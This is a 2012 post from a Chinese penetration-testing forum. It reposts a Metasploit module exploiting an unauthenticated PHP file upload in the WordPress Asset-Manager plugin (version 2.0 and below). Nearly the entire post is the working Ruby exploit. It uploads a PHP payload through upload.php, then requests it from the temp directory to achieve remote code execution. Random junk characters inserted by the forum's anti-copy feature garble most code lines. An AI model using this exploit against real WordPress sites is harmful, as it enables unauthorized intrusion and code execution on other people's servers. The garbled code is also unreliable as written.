找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2707|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。- C0 R. N1 W/ N; R3 y. y

/ F7 q1 i! O" x- Y, A##
7 E; y: E  d; K# ]$ l9 k# This file is part of the Metasploit Framework and may be subject to( F2 C7 T. @3 m6 T, E2 o. L& t6 s
# redistribution and commercial restrictions. Please see the Metasploit
8 J* b, r5 S. k3 p, v, U# Framework web site for more information on licensing and terms of use.
& J' h7 z/ D: o  W#   http://metasploit.com/framework/6 [6 X6 k3 t) I, R3 ~8 t
##
8 a8 s& b/ Z/ E  n
0 p6 Q8 @! v( O- F' |9 Z( ~require 'msf/core': W$ f6 O% w" O  ~$ {9 z# S3 u
require 'msf/core/exploit/php_exe'4 z* N) H! C" E6 O  k* Y* ]/ M
. C" ^0 G7 \4 M2 F+ G
class Metasploit3 < Msf::Exploit::Remote& u# Z: v' t1 o3 d& N6 H/ W, z
  Rank = ExcellentRanking
1 u* Z/ f3 i/ s$ p: }% U0 w 6 _! N5 p* H( C
  include Msf::Exploit::Remote::HttpClient
4 B6 O. a8 Y; l+ b& P& O1 N* G8 b  include Msf::Exploit:hpEXE& S& f7 X2 G6 g+ O# B* E
2 y9 `+ s2 ^" S  Y$ {; j9 B
  def initialize(info = {})1 o# p( c) W1 n* n# p( ~
    super(update_info(info,# ?. x  o% ^$ l, a4 G, `
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',/ [7 s1 F  b9 F. O
      'Description'    => %q{
. ^4 m6 l5 T8 d! U1 F% l0 f        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress' U4 m% ~; Q' R! g7 ~
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
  t5 y% L0 D) \6 Z9 c1 Z3 q' k        temp directory without authentication, which results in arbitrary code execution.) m! q2 j2 g7 s
      },( j9 V: B9 c) O7 e0 u% J
      'Author'         =>0 y) Q. I4 I! Q+ L
        [
  t+ _5 f: s* b+ G& c. G          'Sammy FORGIT', # initial discovery
- z/ n0 t4 v6 N: ]; S          'James Fitts <fitts.james[at]gmail.com>' # metasploit module2 v% h9 e8 w. _+ l; l9 V
        ],) A( Y. F' L4 C1 X/ ]5 V) d4 Q/ J& J
      'License'        => MSF_LICENSE,) z" U2 y, y0 O) Z
      'References'     =>  Y/ c& \2 s. V) c
        [: F" [) Y2 U) j: S' ~
          [ 'OSVDB', '82653' ],
. d/ T+ |1 d( b. u! |+ z          [ 'BID', '53809' ],( G* Q: s+ E" {+ _% P' t- X5 R
          [ 'EDB', '18993' ],# j% l  s* }! b0 a9 \5 P3 Z# Q$ M
          [ 'URL', 'http:// www.myhack58.com /' ]/ x& Q! R9 b  O5 \
        ],
2 `& g/ d" f/ y- W) m      'Payload'       =>
) ]. }  V" R) Q/ a# I        {" x$ J; G7 X. b- x  T+ j" X5 ~$ @
          'BadChars' => "\x00",
! b1 k. A( N7 q! ^6 M4 Q3 ^( ~        },* [! O* `9 ?7 w7 K. a
      'Platform'       => 'php',: y% i% I# G, s7 b
      'Arch'           => ARCH_PHP,
& O6 h3 T! @5 F- l( x      'Targets'        =>
+ M4 Y" K3 f4 M4 O- K5 Y! M        [* A5 u, z) {- q# Y& b
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],8 k% o5 _. ?& Z, G$ P
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]' J0 D* c4 T0 U0 E8 X  ?
        ],
8 T) u9 L1 z' b0 u" _$ \      'DefaultTarget' => 0,8 E* F% G- b% K1 ~7 Z' Y9 l
      'DisclosureDate' => 'May 26 2012'))( H. y9 n: d% ^9 @1 E

+ a+ E4 x4 M7 @- c7 M    register_options(8 h7 t* M* y4 N3 H  s  l# v9 I5 X
      [
6 M% i& ]- Q7 Y3 ?6 h. E& V: `& @, V* @        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])7 j% @1 f" H' l5 o' P! }
      ], self.class)
. |4 M1 r) z/ B; c. `$ W1 L* E  end+ m, d3 A$ q! o* m1 b* o  s
' `8 B7 \8 Z2 H6 Z7 U# V
  def exploit3 @7 ]$ O- I$ U' o8 h0 A
    uri =  target_uri.path
" D; M1 f1 \9 X! i    uri << '/' if uri[-1,1] != '/'
, ]7 \( d9 M# N& F( |    peer = "#{rhost}:#{rport}"" I; j- W. w1 m$ {3 a7 U
    payload_name = "#{rand_text_alpha(5)}.php"
8 {. B+ L/ R. E7 ^9 }    php_payload = get_write_exec_payload(:unlink_self=>true)
1 |1 F1 y* ?$ w6 a / O& C( V) j) _1 i  O# a  ~
    data = Rex::MIME::Message.new
6 L  m7 ^% Q% v3 J0 I/ v    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")4 a* _! }8 S# N: Y. T; x% f
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- ^3 C9 N) k1 X0 y" c

, r/ {$ [: G/ l2 I; |) |% f5 J    print_status("#{peer} - Uploading payload #{payload_name}")
: R7 F7 j, l6 R  {+ [7 V    res = send_request_cgi({- B* _8 L/ a% N; b* M8 r
      'method'  => 'POST',( B% i- X- Q& m. a  X: \" G
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",; T( |5 t  L9 A/ @& t- X4 @
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
- v9 V1 n: r" L% y      'data'    => post_data# P' P( n6 r+ L6 @
    })6 D1 ^( v' E" Z6 y7 }

/ d" ~" J8 B5 ?) g% p2 n3 G' V    if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 r% Z# j* u. k' Y* p. {; [      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
" V  b$ V# E5 ^8 x% D. D0 |end: \4 y+ @0 s8 m
4 O# G( u! |' _' ]. G. C7 n% p
    print_status("#{peer} - Executing payload #{payload_name}")
( }8 C6 h( u. R9 w7 V    res = send_request_raw({
) o. h/ n0 K- N8 Q1 f' ?      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",& Y8 }- G& C0 I. R
      'method'  => 'GET'5 Y4 k* e$ W  l9 H" F% a
    })
' _4 P4 s8 x8 ]6 l2 a
5 }9 q2 [) ~% h; `+ Z    if res and res.code != 200
- u! a. z2 n6 q; l, o      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ B* N& d& s- U' C6 A; Q
    end
0 T# U5 ~6 `2 S/ s  end
; _/ k4 D$ p% R* Vend
) B$ `; Q3 w' x3 I' u" y0 I" k2 G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表